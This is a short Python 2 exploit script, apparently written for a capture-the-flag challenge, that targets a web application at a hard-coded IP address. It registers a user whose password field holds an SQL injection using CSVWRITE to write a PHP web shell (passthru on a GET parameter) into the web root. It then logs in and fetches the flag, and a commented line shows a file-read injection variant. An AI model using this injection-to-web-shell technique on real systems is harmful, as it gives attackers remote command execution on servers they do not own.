#!/usr/bin/python
import os
import requests

URL = 'http://203.66.14.60/do.php'

def login(username, password):
    login_req = {
        'username': username,
        'password': password,
        'action': 'login',
    }
    return requests.post(URL, data=login_req)

def register(username, password):
    register_req = {
        'username': username,
        'password': password,
        'action': 'register',
    }
    return requests.post(URL, data=register_req)

def flag(cookies):
    flag_req = {
        'action': 'flag',
    }
    return requests.post(URL, data=flag_req, cookies=cookies)

def print_r(r):
    print r.headers
    print r.text
    print

username = os.urandom(8).encode('hex')
print 'username =', username

def encode(x):
    out = ''
    for c in x:
        out += '\0' + c
    return out.encode('hex')

myq = encode("select '<?php passthru($_GET[x]); ?>'")
password = "test',(CSVWRITE('/var/www/html/evil.php', hextoraw('%s')))); -- " % myq
#password = "test',file_read('/tmp/evil')); -- "
register_r = register(username, password)
print_r(register_r)

password = 'test'

login_r = login(username, password)
print_r(login_r)

flag_r = flag(login_r.cookies)
print_r(flag_r)